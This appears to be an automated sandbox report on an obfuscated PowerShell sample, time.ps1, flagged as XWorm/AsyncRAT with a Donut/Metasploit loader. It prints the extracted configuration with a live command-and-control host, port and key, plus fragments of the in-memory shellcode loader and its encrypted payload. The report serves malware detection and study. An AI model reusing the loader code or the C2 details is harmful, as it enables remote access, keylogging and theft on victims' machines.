Windows Analysis Report
time.ps1

Overview

General Information

Sample name: time.ps1
Analysis ID: 1432680
MD5: c93510116349ae9e7351554367f35aff
SHA1: 1af844f06676c3258df79cee3e224cc6d7b23a51
SHA256: 3ede00f8296ef04596a6cc514b1809c3e83284edc94f4f7e6a921242aefeae19
Tags: ps1
Infos:

Detection

Metasploit, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected MetasploitPayload
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Found suspicious powershell code related to unpacking or dynamic code loading
Hijacks the control flow in another process
Loading BitLocker PowerShell Module
Queues an APC in another process (thread injection)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: nmds.duckdns.org Avira URL Cloud: Label: malware
Found malware configuration
Source: 0000000F.00000002.2181008240.0000029B03C11000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["nmds.duckdns.org"], "Port": "8895", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
Multi AV Scanner detection for domain / URL
Source: nmds.duckdns.org Virustotal: Detection: 7% Perma Link
Sample uses string decryption to hide its real strings
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack String decryptor: nmds.duckdns.org
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack String decryptor: 8895
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack String decryptor: <123456789>
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack String decryptor: <Xwormmm>
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack String decryptor: USB.exe
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2242458506.000001E70D7B0000.00000004.00000020.00020000.00000000.sdmp

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: nmds.duckdns.org
Source: powershell.exe, 00000000.00000002.2243058884.000001E70F671000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2243058884.000001E70F671000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: time.ps1 String found in binary or memory: https://github.com/DARKNOSY/Rush-PowerShell-Obfuscator

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, XLogger.cs .Net Code: KeyboardLayout
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, XLogger.cs .Net Code: KeyboardLayout

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 15.2.notepad.exe.29b03a70000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.2.notepad.exe.29b03c1ce78.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000000F.00000002.2180226034.0000029B01FA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000F.00000002.2180226034.0000029B01FA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000F.00000002.2180904890.0000029B03A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2242949163.000001E70F250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000000.00000002.2242949163.000001E70F250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000F.00000002.2181008240.0000029B03C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_000001E70F29E55B 0_2_000001E70F29E55B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_000001E70F29E123 0_2_000001E70F29E123
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_000001E70F29E9E3 0_2_000001E70F29E9E3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 0_2_000001E70F29D0DB 0_2_000001E70F29D0DB
Source: C:\Windows\System32\notepad.exe Code function: 15_2_0000029B01FAAF23 15_2_0000029B01FAAF23
Source: C:\Windows\System32\notepad.exe Code function: 15_2_0000029B01FAAB03 15_2_0000029B01FAAB03
Source: C:\Windows\System32\notepad.exe Code function: 15_2_0000029B01FAB7E3 15_2_0000029B01FAB7E3
Source: C:\Windows\System32\notepad.exe Code function: 15_2_0000029B01FA9EDB 15_2_0000029B01FA9EDB
Source: C:\Windows\System32\notepad.exe Code function: 15_2_0000029B01FAB35B 15_2_0000029B01FAB35B
Yara signature match
Source: 15.2.notepad.exe.29b03a70000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.notepad.exe.29b03c1ce78.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000000F.00000002.2180226034.0000029B01FA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000F.00000002.2180226034.0000029B01FA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000F.00000002.2180904890.0000029B03A70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2242949163.000001E70F250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.2242949163.000001E70F250000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 0000000F.00000002.2181008240.0000029B03C11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Helper.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, AlgorithmAES.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, ClientSocket.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winPS1@4/10@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\System32\notepad.exe Mutant created: NULL
Source: C:\Windows\System32\notepad.exe Mutant created: \Sessions\1\BaseNamedObjects\O3B5rRVaa3oX74CD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ewy3psod.ekd.ps1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();Set-StrictMode -Version 2$DoIt = @'function Crypt { param ( [byte[]]$key, [byte[]]$data ) $s = 0..255 $j = 0 for ($i = 0; $i -lt 256; $i++) { $j = ($j + $s[$i] + $key[$i % $key.Length]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] } $i = $j = 0 $output = [byte[]]::new($data.Length) for ($count = 0; $count -lt $data.Length; $count++) { $i = ($i + 1) % 256 $j = ($j + $s[$i]) % 256 $s[$i], $s[$j] = $s[$j], $s[$i] $k = $s[($s[$i] + $s[$j]) % 256] $output[$count] = $data[$count] -bxor $k } $output}function func_get_proc_address{Param($var_module, $var_procedure)$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress',[Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))}function func_get_delegate_type{Param([Parameter(Position = 0, Mandatory = $True)][Type[]] $var_parameters,[Parameter(Position = 1)][Type] $var_return_type = [Void])$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',[System.MulticastDelegate])$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public',[System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')return $var_type_builder.CreateType()}[Byte[]]$encryptedData = [System.Convert]::FromBase64String('kqW+3JCPYSaCQTLm3QJRR36Xx3pGCsiFoyxEVes8XoWqICI/LqAop7K1Bw7nt2mbTMn0uJPUqvUrO7Cl+wt2zDWqOIS6uWyfCvMDfejyx66g4WjLkNezNFeeRZnrw9AHrfPba2XFiewBeiRccMNXLfdc/2mTzA5/rUGoNRLACJZ7vhyJa7RCNmEineVXr9qAhzz7UuCaGsRvrdnzG++QyMBP/ZC6sA/8qAbXOkwY67Ze3MAd8ZsLAD/vtfVC0pWqSfZ3ciFX41yXtgmj7LlT4FPqVI0ztD7YjY5h+1R0AbiLNV6pkmr2u8HjcvJppOx4E59xkgcD05arydTydBIyfbsTR7XUsrfeRT5V7+94nGoLmQWfnDZwnvphI4ppqFgeDj41jbgIaDYir0tPrTL0TLspY934OACvDBHR3KAB5UVFhRuw3SFuU/gy+1uxZvNKaUwUaDeS/Psi5NWN1s39g1MtCh1RhwnrYGsJ5qZZnBXdT2QIBOn/xavUd5AsVGHSFkPgjFUa9SUhxBxPsjneKw1D8g6BHxszQ2WwqD/VhlrcRbwFSNDdQvHtP3vtpJDvP1H04SmnLfz/xpuXetZmYBPRVTwbLPAW82KrtiwkIz7WrxVh5PG4YYX0YN4yVX9wcYPGAhjkBsh8Sgzmf39U0xADsx+IgLx5F+rieW1AO48dw9MSxeBSyEjPDqSOy9QER9K9qpJY5taYtcyvxYI42BxeGKGBAbGx3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\time.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\notepad.exe C:\Windows\System32\notepad.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\notepad.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: time.ps1 Static file information: File size 13631488 > 1048576
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2242458506.000001E70D7B0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Helper.SB(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Messages.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
.NET source code contains potential unpacker
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 15.2.notepad.exe.29b03a70000.0.raw.unpack, Messages.cs .Net Code: Memory
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Messages.cs .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Messages.cs .Net Code: Memory System.AppDomain.Load(byte[])
Source: 15.2.notepad.exe.29b03c1ce78.1.raw.unpack, Messages.cs .Net Code: Memory
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$var_buffer = $var_va.Invoke([IntPtr]::Ze
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('My
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String(@"IyBPYmZ1c2NhdGVkIHVzaW5nIGh0dHBzOi8vZ2l0aHViLmNvbS9EQVJLTk9TWS9SdXNoLVBvd2VyU2hlbGwtT2JmdXNjYXRvciwgbWFkZSBieSBEQVJLTjAkWQoKJGRlY29kZWRTY3JpcHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVV

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
